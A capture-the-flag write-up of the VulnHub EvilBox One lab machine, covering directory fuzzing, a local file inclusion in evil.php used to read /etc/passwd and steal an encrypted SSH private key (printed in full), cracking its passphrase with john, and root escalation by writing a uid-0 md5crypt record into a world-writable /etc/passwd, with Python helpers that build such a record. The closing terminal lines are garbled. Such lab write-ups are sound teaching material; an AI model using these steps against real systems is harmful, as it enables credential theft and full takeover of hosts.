evilbox writeup — vulnhub

Hassan Hossam Fathy Bedair
13 min readJan 10, 2025


source https://www.vulnhub.com/entry/evilbox-one,736/

knowledge required: Linux file permissions, LFI (local file inclusion) web vulnerability

difficulty: easy

author: linkedin.com/in/hassan-hossam-bedair-/

inspired by OSCP instructor Mohab Mustafa: https://www.linkedin.com/in/mohab-mustafa/

First, I want you to understand this: I won’t just run through the steps. We need to understand the *WHY* behind this machine!

What does -rw-rw-rw- mean?

The command ls -lsa /etc/passwd lists details about the /etc/passwd file. Here's the breakdown:

Output:

4 -rw-rw-rw- 1 root root 1398 ago 16  2021 /etc/passwd

Explanation:

  1. 4: The space allocated on disk, in 1 KiB units (this column comes from the -s flag). The file holds only 1398 bytes, but the filesystem has allocated it a full 4 KiB block.
  2. -rw-rw-rw-: These are the file permissions:
  • -: Indicates it is a regular file.
  • rw-: Read and write permissions for the owner.
  • rw-: Read and write permissions for the group.
  • rw-: Read and write permissions for others. This is a dangerous setting: any local user can modify this critical system file. In octal the mode is 0666; the expected mode for /etc/passwd is 0644 (-rw-r--r--).
  3. 1: The number of hard links to this file (usually 1 for regular files).
  4. root root:
  • The first root is the file owner.
  • The second root is the group associated with the file.
  5. 1398: The size of the file in bytes.
  6. ago 16 2021: The last modification date. "ago" is the Spanish abbreviation for August (the box runs with a Spanish locale); the file was last modified on August 16, 2021.
  7. /etc/passwd: The full path of the file.

/etc/passwd File:

This file contains one line per account, with seven colon-separated fields: username, password field, UID, GID, GECOS (comment), home directory and login shell. On a modern system the password field holds an x, which tells the system to look up the real hash in /etc/shadow (readable only by root). If that field instead contains a crypt(3)-style hash, the system authenticates against that hash directly, and a UID of 0 makes the account root. That is why the file must not be writable by anyone other than its owner (root): the current permissions (rw-rw-rw-) let any local user add an account, or replace root's x with a hash they know, and become root. Note that a line only counts if it parses as a full record: a line that stops after the password field has no UID, is ignored by the lookup routines, and su will report that the user does not exist.
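To turn the ls output above into a check you can run on any box, here is an added Python example (not part of the original writeup): it converts an ls mode string to its numeric value and walks a directory tree for regular files that "others" can write. It is demonstrated on a constructed scratch directory rather than on the real /etc/passwd; the file names and contents in demo() are this example's own.

```python
import os
import stat
import tempfile


def ls_mode_to_octal(mode_str: str) -> int:
    """Convert an ls(1) mode string such as '-rw-rw-rw-' into the numeric mode
    (0o666 here). Handles the setuid/setgid/sticky markers s, S, t and T."""
    if len(mode_str) != 10:
        raise ValueError("expected a 10-character ls mode string")
    special = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}
    mode = 0
    for i, ch in enumerate(mode_str[1:]):       # skip the file-type character
        bit = 1 << (8 - i)                      # r/w/x bits for owner, group, other
        if ch in "rwx":
            mode |= bit
        elif ch in "sStT":
            mode |= special[i]
            if ch in "st":                      # lowercase: the execute bit is set as well
                mode |= bit
        elif ch != "-":
            raise ValueError(f"unexpected character {ch!r} in mode string")
    return mode


def is_world_writable(path: str) -> bool:
    """True when 'others' may write the file, which is the /etc/passwd situation on this box."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def world_writable_under(root: str) -> list:
    """Walk a tree and return every regular file that any local user could modify."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if stat.S_ISREG(os.stat(path).st_mode) and is_world_writable(path):
                    hits.append(path)
            except OSError:
                continue                        # unreadable or vanished entry
    return sorted(hits)


def demo() -> tuple:
    """Constructed scratch directory: one file with the bad 0666 mode seen on the box
    and one with the expected 0644 mode. Returns (flagged paths, path of the bad file)."""
    scratch = tempfile.mkdtemp(prefix="evilbox-")
    bad = os.path.join(scratch, "passwd-bad")
    good = os.path.join(scratch, "passwd-good")
    for path, mode in ((bad, 0o666), (good, 0o644)):
        with open(path, "w") as fh:
            fh.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed sample content
        os.chmod(path, mode)
    return world_writable_under(scratch), bad


if __name__ == "__main__":
    print(oct(ls_mode_to_octal("-rw-rw-rw-")))
    flagged, _ = demo()
    print("world-writable:", flagged)
```

On a live target the shell one-liner with the same effect is find / -type f -perm -o=w 2>/dev/null; running world_writable_under("/etc") on this box would have flagged /etc/passwd.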

Alright, how can we abuse this?

  • generate an MD5-based password hash:
openssl passwd -1 password

The command openssl passwd -1 password generates an MD5-based password hash for the string password. Here's a detailed breakdown:

Components:

  1. openssl: OpenSSL is a toolkit for implementing cryptographic operations, including password hashing.
  2. passwd: This subcommand generates password hashes using specified algorithms.
  3. -1: This flag selects the MD5-based crypt scheme (md5crypt, the $1$ format). It is still common on older systems but is considered weak today.
  4. password: This is the plaintext password you want to hash.

Output:

Running the command might produce something like this:

$ openssl passwd -1 password
$1$salt$hash
  • $1$: Indicates the use of the MD5 hashing algorithm.
  • salt: A randomly generated string that makes the hash unique, preventing attacks like precomputed dictionary attacks.
  • hash: The 22-character encoding of the password mixed with the salt, using the crypt alphabet ./0-9A-Za-z. Copy all 22 characters: a trailing / or . is part of the hash, and a truncated hash never matches.

Use Case:

  • The generated hash goes in the password field of an account record: normally in /etc/shadow, but on this box straight into the second field of /etc/passwd, where the system honours it directly. Single-quote the hash whenever you pass it through a shell: unquoted or double-quoted, $1 is expanded as a positional parameter and $mDHMu235 as a (nonexistent) variable, and only the leftover pieces get written.

Security Note:

  • MD5-crypt is no longer considered adequate for password hashing: it runs a fixed 1000 rounds of MD5, a cost chosen in the 1990s, so offline brute force with john or hashcat is cheap. (MD5's collision weakness is not the issue for stored passwords; speed is.)

— -

Modern alternatives like SHA-512-crypt or bcrypt are recommended for better security:

  • For SHA-512-crypt (the $6$ scheme): openssl passwd -6 password. SHA-256-crypt ($5$) is openssl passwd -5.
  • For bcrypt (via another tool): htpasswd -B, or a dedicated bcrypt library.
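As an added example (not code from the original post), the following Python reimplements the md5crypt scheme behind openssl passwd -1, reproduces the exact hash the writeup obtains later on the box for the string passwd with salt mDHMu235, and then builds and validates a complete seven-field /etc/passwd record. The UID/GID of 0 and the /root and /bin/bash defaults are this example's assumptions for a root-equivalent account; the parser treats anything other than seven fields as malformed, which is slightly stricter than glibc (whose parser mainly needs numeric UID and GID fields).

```python
import hashlib
import hmac
import secrets

# crypt(3) base64 alphabet used by md5crypt
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def md5crypt(password: str, salt: str, magic: str = "$1$") -> str:
    """Pure-Python port of md5crypt, the $1$ scheme `openssl passwd -1` produces.
    The salt is at most 8 characters; the result is magic + salt + '$' + 22 chars."""
    pw = password.encode()
    salt_b = salt[:8].encode()

    ctx = hashlib.md5(pw + magic.encode() + salt_b)
    # Mix in MD5(pw + salt + pw), one byte per byte of the password.
    inner = hashlib.md5(pw + salt_b + pw).digest()
    for i in range(len(pw)):
        ctx.update(inner[i % 16:i % 16 + 1])
    # For each bit of len(pw): a NUL byte if the bit is set, else the first password byte.
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # Exactly 1000 stretching rounds, a fixed cost that is cheap on modern hardware.
    for i in range(1000):
        ctx = hashlib.md5()
        ctx.update(pw if i & 1 else final)
        if i % 3:
            ctx.update(salt_b)
        if i % 7:
            ctx.update(pw)
        ctx.update(final if i & 1 else pw)
        final = ctx.digest()

    # Re-order the 16 digest bytes and encode 6 bits at a time, least significant first.
    out = []
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return magic + salt_b.decode() + "$" + "".join(out)


def new_md5crypt_hash(password: str) -> str:
    """Hash with a fresh random 8-character salt, like `openssl passwd -1` without -salt."""
    return md5crypt(password, "".join(secrets.choice(ITOA64) for _ in range(8)))


def verify_md5crypt(hashed: str, password: str) -> bool:
    """Check a password against a $1$salt$hash string (constant-time comparison)."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "1":
        return False
    return hmac.compare_digest(md5crypt(password, parts[2]), hashed)


def parse_passwd_line(line: str):
    """Return the record as a dict, or None for a line that does not define an
    account: blank, or not the seven colon-separated fields."""
    line = line.rstrip("\n")
    if not line or line.count(":") != 6:
        return None
    return dict(zip(PASSWD_FIELDS, line.split(":")))


def make_passwd_record(name: str, hashed: str, uid: int = 0, gid: int = 0,
                       home: str = "/root", shell: str = "/bin/bash") -> str:
    """Build a complete seven-field line. A hash in field 2 is honoured directly
    (x would defer to /etc/shadow); uid 0 makes the account root-equivalent (assumed defaults)."""
    for value in (name, hashed, home, shell):
        if ":" in value or "\n" in value:
            raise ValueError("passwd fields may not contain ':' or newline")
    return f"{name}:{hashed}:{uid}:{gid}:{name}:{home}:{shell}"


if __name__ == "__main__":
    h = md5crypt("passwd", "mDHMu235")
    print(h)                                   # the hash obtained on the box
    print(make_passwd_record("attacker", h))
    print(parse_passwd_line("attacker:" + h))  # None: only two fields, not an account
```

The record returned by make_passwd_record is what needs to be appended (single-quoted) to a world-writable /etc/passwd; the two-field line the writeup appends first is exactly what parse_passwd_line rejects.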

Let’s discuss my mistakes before showing you my final command line:

  • openssl passwd -1 root # now we generated a hash of ‘root’ # root will be asked for as the password!
  • evil.php was not leaked during my ffuf scan. I had to use gobuster instead.

Revision) Why was mowree able to edit the /etc/passwd file?

None of the groups mowree belongs to (see the id output below) carries any privilege over /etc/passwd, so mowree should not normally be able to edit it. However, because the file grants rw- to others, mowree, like every other local user, can write to it directly.

— -

File Permissions:

  • rw- (owner: root): The file owner (root) has read and write permissions.
  • rw- (group: root): The file group (root) has read and write permissions.
  • rw- (others): Everyone else has read and write permissions.

— -

mowree’s User Information:

  • uid=1000(mowree): User ID and username of mowree.
  • gid=1000(mowree): Group ID and primary group of mowree.
  • grupos=1000(mowree),...: Supplementary groups mowree belongs to (grupos is Spanish for groups; the box runs with a Spanish locale).

— -

reminder on command output

  • Let us id mowree!
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
  • let’s find file permissions of /etc/passwd
mowree@EvilBoxOne:~$ ls -lsa /etc/passwd
4 -rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd

One terminal session showing all my steps!

┌──(kali㉿kali)-[~]
└─$ sudo su
[sudo] password for kali:
┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop Documents Downloads Music Pictures Public Templates Videos

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:6e:13:6e, IPv4: 192.168.56.102
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:59:fa:bc (Unknown)
192.168.56.104 08:00:27:29:c6:cf (Unknown)
^C

┌──(root㉿kali)-[/home/kali]
└─# ping 192.168.56.104
PING 192.168.56.104 (192.168.56.104) 56(84) bytes of data.
64 bytes from 192.168.56.104: icmp_seq=1 ttl=64 time=0.934 ms
^C
--- 192.168.56.104 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.934/0.934/0.934/0.000 ms

┌──(root㉿kali)-[/home/kali]
└─# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=44.9 ms
^C
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 44.948/44.948/44.948/0.000 ms

┌──(root㉿kali)-[/home/kali]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255
inet6 fe80::ef9c:d01:a30b:1a1c prefixlen 64 scopeid 0x20<link>
ether 08:00:27:6e:13:6e txqueuelen 1000 (Ethernet)
RX packets 12 bytes 2916 (2.8 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 536 bytes 33910 (33.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.4 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::250d:5230:bbe9:4769 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:ba:8b:d0 txqueuelen 1000 (Ethernet)
RX packets 5 bytes 868 (868.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 26 bytes 3310 (3.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8 bytes 480 (480.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 480 (480.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0


┌──(root㉿kali)-[/home/kali]
└─# export victim=192.168.56.104

┌──(root㉿kali)-[/home/kali]
└─# echo $victim
192.168.56.104

┌──(root㉿kali)-[/home/kali]
└─# ping $victim
PING 192.168.56.104 (192.168.56.104) 56(84) bytes of data.
64 bytes from 192.168.56.104: icmp_seq=1 ttl=64 time=2.24 ms
64 bytes from 192.168.56.104: icmp_seq=2 ttl=64 time=0.744 ms
^C
--- 192.168.56.104 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1004ms
rtt min/avg/max/mdev = 0.744/1.490/2.236/0.746 ms

┌──(root㉿kali)-[/home/kali]
└─# nmap -sCV $victim
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-10 03:00 EST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 03:00 (0:00:06 remaining)
Nmap scan report for 192.168.56.104
Host is up (0.00029s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:29:C6:CF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds

┌──(root㉿kali)-[/home/kali]
└─# cd /usr/share/dirbuster/wordlists/

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# ffuf -w directory-list-lowercase-2.3-medium.txt -t 100 -u http://$victim/FUZZ

[ffuf banner]

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.56.104/FUZZ
:: Wordlist : FUZZ: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# Copyright 2007 James Fisher [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 6ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 26ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 26ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 781ms]
# directory-list-lowercase-2.3-medium.txt [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 989ms]
# on atleast 2 different hosts [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1563ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1755ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 1771ms]
secret [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 3ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3756ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3770ms]
# [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3782ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3790ms]
# Priority ordered case insensative list, where entries were found [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 3798ms]
[Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 9ms]
[WARN] Caught keyboard interrupt (Ctrl-C)



┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://$vicitm/secret
curl: (6) Could not resolve host: secret

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104/secret
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.104/secret/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.104 Port 80</address>
</body></html>

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104:80/secret
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.104/secret/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.104 Port 80</address>
</body></html>

### had to quickly mkdir and cd into evilbox

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# gobuster dir -r -u http://192.168.56.104/secret/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,txt -o dir-secret.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.104/secret/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php,html
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 4]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/evil.php (Status: 200) [Size: 0]
Progress: 61335 / 882244 (6.95%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 64294 / 882244 (7.29%)
===============================================================
Finished
===============================================================


┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# ffuf -w directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.104/secret/evil.php?FUZZ=/etc/passwd -fs 0

[ffuf banner]

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.56.104/secret/evil.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________

command [Status: 200, Size: 1398, Words: 13, Lines: 27, Duration: 12ms]
:: Progress: [207643/207643] :: Job [1/1] :: 5952 req/sec :: Duration: [0:00:41] :: Errors: 0 ::

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104:80/secret/evil.php?command=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# echo "LFI spotted"
LFI spotted

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# curl http://192.168.56.104:80/secret/evil.php?command=/home/mowree/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
[... key body, identical to the id_rsa file shown below ...]
-----END RSA PRIVATE KEY-----

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# ls
apache-user-enum-1.0.txt directory-list-1.0.txt directory-list-lowercase-2.3-medium.txt
apache-user-enum-2.0.txt directory-list-2.3-medium.txt directory-list-lowercase-2.3-small.txt
directories.jbrofuzz directory-list-2.3-small.txt

┌──(root㉿kali)-[/usr/share/dirbuster/wordlists]
└─# cd /home/kali/Desktop

┌──(root㉿kali)-[/home/kali/Desktop]
└─# mkdir evilbox

┌──(root㉿kali)-[/home/kali/Desktop]
└─# cd evilbox

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ls

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# curl http://192.168.56.104:80/secret/evil.php?command=/home/mowree/.ssh/id_rsa >> id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1743 100 1743 0 0 402k 0 --:--:-- --:--:-- --:--:-- 425k

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ls
id_rsa

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# chmod 600 id_rsa

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ssh2john id_rsa > key.hash

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# cat key.hash
id_rsa:$sshng$0$8$9FB14B3F3D04E90E$1192$[... hex-encoded key body elided ...]

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# john key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
unicorn (id_rsa)
1g 0:00:00:00 DONE 2/3 (2025-01-10 03:10) 7.142g/s 90957p/s 90957c/s 90957C/s surfer..unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# echo "unicorn"
unicorn

┌──(root㉿kali)-[/home/kali/Desktop/evilbox]
└─# ssh -i id_rsa mowree@192.168.56.104
The authenticity of host '192.168.56.104 (192.168.56.104)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.104' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
mowree@EvilBoxOne:~$ whoami
mowree
mowree@EvilBoxOne:~$ ls -lsa /etc/passwd
4 -rw-rw-rw- 1 root root 1398 ago 16 2021 /etc/passwd
mowree@EvilBoxOne:~$ openssl passwd -1 passwd
$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
mowree@EvilBoxOne:~$ ^Cho 'hacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/
mowree@EvilBoxOne:~$ ls
attack user.txt
mowree@EvilBoxOne:~$ cat attack
attacker:$1$mDHMu235$dP3Xu6DnA067MXmUdbsme/

# openssl passwd -1 password 'command_output'
# then attach attacker to this 'command_output'
